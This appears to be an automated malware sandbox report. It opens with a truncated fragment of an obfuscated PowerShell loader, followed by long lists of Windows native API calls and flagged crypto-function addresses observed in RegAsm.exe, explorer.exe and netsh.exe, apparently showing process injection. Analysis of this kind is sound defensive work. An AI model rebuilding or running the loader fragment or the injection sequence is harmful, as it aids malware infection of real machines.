ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@H Jump to behavior
Contains functionality to call native functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0041A330 NtCreateFile, 6_2_0041A330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0041A3E0 NtReadFile, 6_2_0041A3E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0041A460 NtClose, 6_2_0041A460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0041A510 NtAllocateVirtualMemory, 6_2_0041A510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0041A32B NtCreateFile, 6_2_0041A32B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0041A382 NtReadFile, 6_2_0041A382
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0041A45A NtClose, 6_2_0041A45A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0041A50A NtAllocateVirtualMemory, 6_2_0041A50A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102B60 NtClose,LdrInitializeThunk, 6_2_03102B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 6_2_03102BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102AD0 NtReadFile,LdrInitializeThunk, 6_2_03102AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102F30 NtCreateSection,LdrInitializeThunk, 6_2_03102F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102F90 NtProtectVirtualMemory,LdrInitializeThunk, 6_2_03102F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102FB0 NtResumeThread,LdrInitializeThunk, 6_2_03102FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102FE0 NtCreateFile,LdrInitializeThunk, 6_2_03102FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102E80 NtReadVirtualMemory,LdrInitializeThunk, 6_2_03102E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102EA0 NtAdjustPrivilegesToken,LdrInitializeThunk, 6_2_03102EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102D10 NtMapViewOfSection,LdrInitializeThunk, 6_2_03102D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102D30 NtUnmapViewOfSection,LdrInitializeThunk, 6_2_03102D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102DD0 NtDelayExecution,LdrInitializeThunk, 6_2_03102DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102DF0 NtQuerySystemInformation,LdrInitializeThunk, 6_2_03102DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102C70 NtFreeVirtualMemory,LdrInitializeThunk, 6_2_03102C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102CA0 NtQueryInformationToken,LdrInitializeThunk, 6_2_03102CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03104340 NtSetContextThread, 6_2_03104340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03103010 NtOpenDirectoryObject, 6_2_03103010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03103090 NtSetValueKey, 6_2_03103090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03104650 NtSuspendThread, 6_2_03104650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031035C0 NtCreateMutant, 6_2_031035C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102B80 NtQueryInformationFile, 6_2_03102B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102BA0 NtEnumerateValueKey, 6_2_03102BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102BE0 NtQueryValueKey, 6_2_03102BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102AB0 NtWaitForSingleObject, 6_2_03102AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102AF0 NtWriteFile, 6_2_03102AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031039B0 NtGetContextThread, 6_2_031039B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102F60 NtCreateProcessEx, 6_2_03102F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102FA0 NtQuerySection, 6_2_03102FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102E30 NtWriteVirtualMemory, 6_2_03102E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102EE0 NtQueueApcThread, 6_2_03102EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03103D10 NtOpenProcessToken, 6_2_03103D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102D00 NtSetInformationFile, 6_2_03102D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03103D70 NtOpenThread, 6_2_03103D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102DB0 NtEnumerateKey, 6_2_03102DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102C00 NtQueryInformationProcess, 6_2_03102C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102C60 NtCreateKey, 6_2_03102C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102CC0 NtQueryVirtualMemory, 6_2_03102CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03102CF0 NtOpenProcess, 6_2_03102CF0
Source: C:\Windows\explorer.exe Code function: 7_2_0F3E3232 NtCreateFile, 7_2_0F3E3232
Source: C:\Windows\explorer.exe Code function: 7_2_0F3E4E12 NtProtectVirtualMemory, 7_2_0F3E4E12
Source: C:\Windows\explorer.exe Code function: 7_2_0F3E4E0A NtProtectVirtualMemory, 7_2_0F3E4E0A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_035135C0 NtCreateMutant,LdrInitializeThunk, 8_2_035135C0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512B60 NtClose,LdrInitializeThunk, 8_2_03512B60
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512AD0 NtReadFile,LdrInitializeThunk, 8_2_03512AD0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512F30 NtCreateSection,LdrInitializeThunk, 8_2_03512F30
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512FE0 NtCreateFile,LdrInitializeThunk, 8_2_03512FE0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512EA0 NtAdjustPrivilegesToken,LdrInitializeThunk, 8_2_03512EA0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512D10 NtMapViewOfSection,LdrInitializeThunk, 8_2_03512D10
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512DD0 NtDelayExecution,LdrInitializeThunk, 8_2_03512DD0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512DF0 NtQuerySystemInformation,LdrInitializeThunk, 8_2_03512DF0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512C70 NtFreeVirtualMemory,LdrInitializeThunk, 8_2_03512C70
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512C60 NtCreateKey,LdrInitializeThunk, 8_2_03512C60
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512CA0 NtQueryInformationToken,LdrInitializeThunk, 8_2_03512CA0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03514340 NtSetContextThread, 8_2_03514340
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03513010 NtOpenDirectoryObject, 8_2_03513010
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03513090 NtSetValueKey, 8_2_03513090
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03514650 NtSuspendThread, 8_2_03514650
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512BF0 NtAllocateVirtualMemory, 8_2_03512BF0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512BE0 NtQueryValueKey, 8_2_03512BE0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512B80 NtQueryInformationFile, 8_2_03512B80
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512BA0 NtEnumerateValueKey, 8_2_03512BA0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512AF0 NtWriteFile, 8_2_03512AF0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512AB0 NtWaitForSingleObject, 8_2_03512AB0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_035139B0 NtGetContextThread, 8_2_035139B0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512F60 NtCreateProcessEx, 8_2_03512F60
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512F90 NtProtectVirtualMemory, 8_2_03512F90
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512FB0 NtResumeThread, 8_2_03512FB0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512FA0 NtQuerySection, 8_2_03512FA0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512E30 NtWriteVirtualMemory, 8_2_03512E30
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512EE0 NtQueueApcThread, 8_2_03512EE0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512E80 NtReadVirtualMemory, 8_2_03512E80
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03513D70 NtOpenThread, 8_2_03513D70
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03513D10 NtOpenProcessToken, 8_2_03513D10
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512D00 NtSetInformationFile, 8_2_03512D00
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512D30 NtUnmapViewOfSection, 8_2_03512D30
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512DB0 NtEnumerateKey, 8_2_03512DB0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512C00 NtQueryInformationProcess, 8_2_03512C00
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512CC0 NtQueryVirtualMemory, 8_2_03512CC0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03512CF0 NtOpenProcess, 8_2_03512CF0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00B1A3E0 NtReadFile, 8_2_00B1A3E0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00B1A330 NtCreateFile, 8_2_00B1A330
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00B1A460 NtClose, 8_2_00B1A460
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00B1A382 NtReadFile, 8_2_00B1A382
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00B1A32B NtCreateFile, 8_2_00B1A32B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00B1A45A NtClose, 8_2_00B1A45A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03249BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose, 8_2_03249BAF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0324A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread, 8_2_0324A036
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03249BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection, 8_2_03249BB2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0324A042 NtQueryInformationProcess, 8_2_0324A042
Detected potential crypto function
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_00401030 6_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0041D93B 6_2_0041D93B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0041E54C 6_2_0041E54C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_00402D90 6_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_00409E60 6_2_00409E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_00409E1B 6_2_00409E1B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0041DE2C 6_2_0041DE2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0041DF84 6_2_0041DF84
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_00402FB0 6_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0041E7B8 6_2_0041E7B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0318132D 6_2_0318132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BD34C 6_2_030BD34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0318A352 6_2_0318A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0311739A 6_2_0311739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030DE3F0 6_2_030DE3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031903E6 6_2_031903E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03170274 6_2_03170274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D52A0 6_2_030D52A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030EB2C0 6_2_030EB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031712ED 6_2_031712ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C0100 6_2_030C0100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0316A118 6_2_0316A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0319B16B 6_2_0319B16B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030BF172 6_2_030BF172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0310516C 6_2_0310516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031901AA 6_2_031901AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030DB1B0 6_2_030DB1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031881CC 6_2_031881CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D70C0 6_2_030D70C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0317F0CC 6_2_0317F0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031870E9 6_2_031870E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0318F0E0 6_2_0318F0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030F4750 6_2_030F4750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D0770 6_2_030D0770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0318F7B0 6_2_0318F7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_031816CC 6_2_031816CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030EC6E0 6_2_030EC6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D0535 6_2_030D0535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03187571 6_2_03187571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03190591 6_2_03190591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0316D5B0 6_2_0316D5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0318F43F 6_2_0318F43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03182446 6_2_03182446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C1460 6_2_030C1460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0317E4F6 6_2_0317E4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0318AB40 6_2_0318AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0318FB76 6_2_0318FB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030EFB80 6_2_030EFB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03186BD7 6_2_03186BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0310DBF9 6_2_0310DBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0318FA49 6_2_0318FA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03187A46 6_2_03187A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03143A6C 6_2_03143A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030CEA80 6_2_030CEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03115AA0 6_2_03115AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0316DAAC 6_2_0316DAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0317DAC6 6_2_0317DAC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D9950 6_2_030D9950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030EB950 6_2_030EB950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030E6962 6_2_030E6962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D29A0 6_2_030D29A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0319A9A6 6_2_0319A9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0313D800 6_2_0313D800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D2840 6_2_030D2840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030DA840 6_2_030DA840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030B68B8 6_2_030B68B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D38E0 6_2_030D38E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030FE8F0 6_2_030FE8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0318FF09 6_2_0318FF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03112F28 6_2_03112F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030F0F30 6_2_030F0F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03144F40 6_2_03144F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D1F92 6_2_030D1F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0318FFB1 6_2_0318FFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C2FC8 6_2_030C2FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030DCFE0 6_2_030DCFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0318EE26 6_2_0318EE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D0E59 6_2_030D0E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0318CE93 6_2_0318CE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030E2E90 6_2_030E2E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D9EB0 6_2_030D9EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0318EEDB 6_2_0318EEDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030DAD00 6_2_030DAD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03181D5A 6_2_03181D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D3D40 6_2_030D3D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03187D73 6_2_03187D73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030E8DBF 6_2_030E8DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030EFDC0 6_2_030EFDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030CADE0 6_2_030CADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030D0C00 6_2_030D0C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03149C32 6_2_03149C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_03170CB5 6_2_03170CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_0318FCF2 6_2_0318FCF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 6_2_030C0CF2 6_2_030C0CF2
Source: C:\Windows\explorer.exe Code function: 7_2_0BC02B30 7_2_0BC02B30
Source: C:\Windows\explorer.exe Code function: 7_2_0BC02B32 7_2_0BC02B32
Source: C:\Windows\explorer.exe Code function: 7_2_0BC08232 7_2_0BC08232
Source: C:\Windows\explorer.exe Code function: 7_2_0BC0B5CD 7_2_0BC0B5CD
Source: C:\Windows\explorer.exe Code function: 7_2_0BBFFD02 7_2_0BBFFD02
Source: C:\Windows\explorer.exe Code function: 7_2_0BC05912 7_2_0BC05912
Source: C:\Windows\explorer.exe Code function: 7_2_0BBFE082 7_2_0BBFE082
Source: C:\Windows\explorer.exe Code function: 7_2_0BC07036 7_2_0BC07036
Source: C:\Windows\explorer.exe Code function: 7_2_0F25AB30 7_2_0F25AB30
Source: C:\Windows\explorer.exe Code function: 7_2_0F25AB32 7_2_0F25AB32
Source: C:\Windows\explorer.exe Code function: 7_2_0F260232 7_2_0F260232
Source: C:\Windows\explorer.exe Code function: 7_2_0F257D02 7_2_0F257D02
Source: C:\Windows\explorer.exe Code function: 7_2_0F25D912 7_2_0F25D912
Source: C:\Windows\explorer.exe Code function: 7_2_0F2635CD 7_2_0F2635CD
Source: C:\Windows\explorer.exe Code function: 7_2_0F25F036 7_2_0F25F036
Source: C:\Windows\explorer.exe Code function: 7_2_0F256082 7_2_0F256082
Source: C:\Windows\explorer.exe Code function: 7_2_0F3E3232 7_2_0F3E3232
Source: C:\Windows\explorer.exe Code function: 7_2_0F3DDB30 7_2_0F3DDB30
Source: C:\Windows\explorer.exe Code function: 7_2_0F3DDB32 7_2_0F3DDB32
Source: C:\Windows\explorer.exe Code function: 7_2_0F3E0912 7_2_0F3E0912
Source: C:\Windows\explorer.exe Code function: 7_2_0F3DAD02 7_2_0F3DAD02
Source: C:\Windows\explorer.exe Code function: 7_2_0F3E65CD 7_2_0F3E65CD
Source: C:\Windows\explorer.exe Code function: 7_2_0F3E2036 7_2_0F3E2036
Source: C:\Windows\explorer.exe Code function: 7_2_0F3D9082 7_2_0F3D9082
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00E35EB0 8_2_00E35EB0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_034CD34C 8_2_034CD34C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0359A352 8_2_0359A352
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0359132D 8_2_0359132D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_035A03E6 8_2_035A03E6
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_034EE3F0 8_2_034EE3F0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0352739A 8_2_0352739A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_03580274 8_2_03580274
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_034FB2C0 8_2_034FB2C0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_035812ED 8_2_035812ED
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_034E52A0 8_2_034E52A0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_035AB16B 8_2_035AB16B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0351516C 8_2_0351516C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_034CF172 8_2_034CF172
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_034D0100 8_2_034D0100
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0357A118 8_2_0357A118
